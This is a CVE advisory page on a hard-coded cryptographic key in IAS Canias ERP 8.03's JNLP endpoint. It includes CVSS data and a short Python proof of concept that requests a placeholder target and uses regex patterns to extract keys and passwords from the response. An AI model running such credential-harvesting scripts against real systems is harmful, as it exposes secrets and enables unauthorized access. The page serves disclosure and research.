Security Vulnerability Report
中文
CVE-2026-8243 CVSS 5.3 MEDIUM

CVE-2026-8243

Published: 2026-05-10 09:16:32
Last Modified: 2026-05-11 15:08:10
Source: [email protected]

Description

A vulnerability was determined in Industrial Application Software IAS Canias ERP 8.03. This affects an unknown function of the component JNLP Deployment Endpoint. Executing a manipulation can lead to use of hard-coded cryptographic key . The attack may be performed from remote. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

IAS Canias ERP 8.03

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import re import requests # Proof of Concept for CVE-2026-8243 # Description: Checks for hardcoded keys in JNLP endpoint responses. # Target: IAS Canias ERP 8.03 def check_hardcoded_keys(target_url): """ Fetches the target URL and searches for potential hardcoded keys. """ try: response = requests.get(target_url, timeout=10) content = response.text # Regex pattern to find potential hardcoded keys (Base64 strings or specific key declarations) # Note: Adjust pattern based on actual application structure key_patterns = [ r'(private[_-]?key|secret[_-]?key|api[_-]?key)[\s]*[:=][\s]*["\']([a-zA-Z0-9+/=]{16,})["\']', r'password[\s]*[:=][\s]*["\']([^"\'>]{8,})["\']' ] found_keys = [] for pattern in key_patterns: matches = re.findall(pattern, content, re.IGNORECASE) if matches: found_keys.extend(matches) if found_keys: print(f"[+] Potential hardcoded keys found at {target_url}:") for match in found_keys: print(f" - {match}") else: print("[-] No obvious hardcoded keys detected in response.") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": # Replace with actual target endpoint target = "http://target-host:port/canias/jnlp/launch" check_hardcoded_keys(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8243", "sourceIdentifier": "[email protected]", "published": "2026-05-10T09:16:32.200", "lastModified": "2026-05-11T15:08:09.893", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Industrial Application Software IAS Canias ERP 8.03. This affects an unknown function of the component JNLP Deployment Endpoint. Executing a manipulation can lead to use of hard-coded cryptographic key\r . The attack may be performed from remote. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-320"}, {"lang": "en", "value": "CWE-321"}]}], "references": [{"url": "https://vuldb.com/submit/808296", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/362459", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/362459/cti", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.